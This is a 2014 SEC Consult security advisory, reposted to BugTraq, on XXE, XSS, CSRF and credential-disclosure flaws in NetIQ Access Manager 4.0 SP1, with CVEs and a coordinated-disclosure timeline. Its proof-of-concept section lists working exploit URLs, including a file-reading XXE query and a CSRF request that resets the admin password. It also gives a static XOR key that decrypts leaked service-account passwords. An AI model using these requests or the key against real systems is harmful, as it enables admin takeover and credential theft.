BugTraq
SEC Consult SA-20141218-2 :: Multiple high risk vulnerabilities in NetIQ Access Manager Dec 18 2014 01:36PM
SEC Consult Vulnerability Lab (research sec-consult com)
SEC Consult Vulnerability Lab Security Advisory < 20141218-2 >
=======================================================================
title: Multiple high risk vulnerabilities
product: NetIQ Access Manager
vulnerable version: 4.0 SP1
fixed version: 4.0 SP1 Hot Fix 3
CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216,
CVE-2014-5217
impact: High
homepage: https://www.netiq.com/
found: 2014-10-29
by: W. Ettlinger
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
"As demands for secure web access expand and delivery becomes increasingly
complex, organizations face some formidable challenges. Access Manager
provides a simple yet secure and scalable solution that can handle all your
web access needsâ??both internal as well as in the cloud."

URL: https://www.netiq.com/products/access-manager/

Business recommendation:
------------------------
An attacker without an account on the NetIQ Access Manager is be able to gain
administrative access by combining different attack vectors. Though this host
may not always be accessible from a public network, an attacker is still able
to compromise the system when directly targeting administrative users.

Because the NetIQ Access Manager is used for authentication, an attacker
compromising the system can use it to gain access to other systems.

SEC Consult highly recommends that this software is not used until a full
security review has been performed and all issues have been resolved.

Vulnerability overview/description:
-----------------------------------
1) XML eXternal Entity Injection (XXE, CVE-2014-5214)
Authenticated administrative users can download arbitrary files from the Access
Manager administration interface as the user "novlwww".

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015993

2) Reflected Cross Site Scripting (XSS, CVE-2014-5216)
Multiple reflected cross site scripting vulnerabilities were found. These
allow effective attacks of administrative and SSLVPN sessions.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015994

3) Persistent Site Scripting (XSS, CVE-2014-5216)
A persistent cross site scripting vulnerability was found. This allows
effective attacks of administrative and SSLVPN sessions.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015996

4) Cross Site Request Forgery (CVE-2014-5217)
The Access Manager administration interface does not have CSRF protection.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015997

5) Information Disclosure (CVE-2014-5215)
Authenticated users of the administration interface can gain authentication
information of internal administrative users.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015995

By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
unauthenticated, non-admin user may gain full access to the system!

Proof of concept:
-----------------
1) XML eXternal Entity Injection (XXE)
As an example, the following URL demonstrates the retrieval of the /etc/passwd
file as an authenticated administrative user:

https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nex
tState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0
a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include
%3b</container><subclasses>false</subclasses></query>

2) Reflected Cross Site Scripting (XSS)
The following URLs demonstrate different reflected XSS flaws in the
administration interface and the user interface.

https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.Generic
Task&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'

https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27
xss%27%29%3C/script%3E

https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%
20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E

https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%
29%3C/script%3E

https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%2
7xss%27%29%3C/script%3E

3) Persistent Site Scripting (XSS)
The following URL injects a stored script on the auditing page:

https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsav
e&&secureLoggingServersA='){}};alert('xss');function+x(){if('&port=1289

4) Cross Site Request Forgery
As an example, an attacker is able to change the administration password to
'12345' by issuing a GET request in the context of an authenticated
administrator. The old password is not necessary for this attack!

https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=d
oSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=a
dmin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345

5) Information Disclosure
The following URLs disclose several useful information to an authenticated
account:

https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsp
https://<host>:8443/roma/jsp/debug/debug.jsp

The disclosed system properties:
com.volera.vcdn.monitor.password
com.volera.vcdn.alert.password
com.volera.vcdn.sync.password
com.volera.vcdn.scheduler.password
com.volera.vcdn.publisher.password
com.volera.vcdn.application.sc.scheduler.password
com.volera.vcdn.health.password

The static string "k~jd)*L2;93=Gjs" is XORed with these values in order
to decrypt passwords of internally used service accounts.

By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
unauthenticated, non-admin user may gain full access to the system!

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the NetIQ Access Manager
version 4.0 SP1, which was the most recent version at the time of discovery.

Vendor contact timeline:
------------------------
2014-10-29: Contacting security (at) netiq (dot) com [email concealed], sending responsible disclosure
policy and PGP keys
2014-10-29: Vendor redirects to security (at) novell (dot) com [email concealed], providing PGP keys
through Novell support page
2014-10-30: Sending encrypted security advisory to Novell
2014-10-30: Novell acknowledges the receipt of the advisory
2014-12-16: Novell: the vulnerability fixes will be released tomorrow;
The CSRF vulnerability will not be fixed immediately
("Since this can be done only after an authorized login");
two XSS vulnerabilities can not be exploited ("We could not
take advantage or retrieve any cookie info on the server
side - it looks like it's a client side cross scripting
attack.")
2014-12-16: Explaining why those vulnerabilities can be exploited
2014-12-17: Novell: Fix will be released tomorrow
2014-12-17: Verifying release of advisory tomorrow
2014-12-18: Novell: Advisory can be released
2014-12-18: Coordinated release of security advisory

Solution:
---------
Update to the latest available of Access Manager and implement workarounds
mentioned in the KB articles by Novell linked above.

Workaround:
-----------
For some vulnerabilities, Novell provides best practice recommendations in the
URLs linked above.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career (at) sec-consult (dot) com [email concealed]

EOF W. Ettlinger / @2014

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBAgAGBQJUkthzAAoJEC0t17XG7og/RXkP/AlTfMh7+43F5jl7wLl1aaQl
drkY0s7Bx10pI8qdnuk5AoMeho2R04O3tGqRApbhPPoATMxmSH4u51ypqfSAvDyq
/eOWJM/VyDceHCsKzvVe575jzHQK4AU6/1ksHG48DL3joHsmlyNBnxSJ9UxRPkNZ
1yvWOARUMjPofUBdQV1E6aHoICGsOzk+YOzaRk2OSYfLop6KhTqXiF+WcLDTwxEs
vdjh2xEovKfZgnPNRXLHnGipw2nGaETIKrEuu+4m1639IsCEDeYJ+9ENPVVe4puc
AxnXl4cQOD1iUYFioBqHPJVxDnWZxnqEEvZkG+cC9Xl5l6uMYhgc4eFHv0sjDKq0
fNT/gxbEj8o6F6N0buRYdXcsXSMUQmlbeHR9DRkRede9i5pvJgkhLllNf2cnTfJH
vMSjFj/p9D7kHEGyuUssa5UOL2jze3zUQJcfWqrqS/Gh9+nS+VjLNluxSY9SJu9H
wHvBgyEKrdtO/nvOlRdnI7CJ4E08zGTPDlhJOJIytS6ZWlUSPM3AKAlxWu7tL9Ee
U4iAL7CVcbZCNqgf1d1t05XbxhppEVZex6YT7kIXX4z3O+wobfxv39CuEAtM8U3t
63vh6WjbyUJNhHkG/rYG36JfZmvWxTnaxkz1xH0KwwCoxy1TUD9AR/0L1ZnhknJ8
DpaAXtnjYkSSwhzvGbLf
=KDDF
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus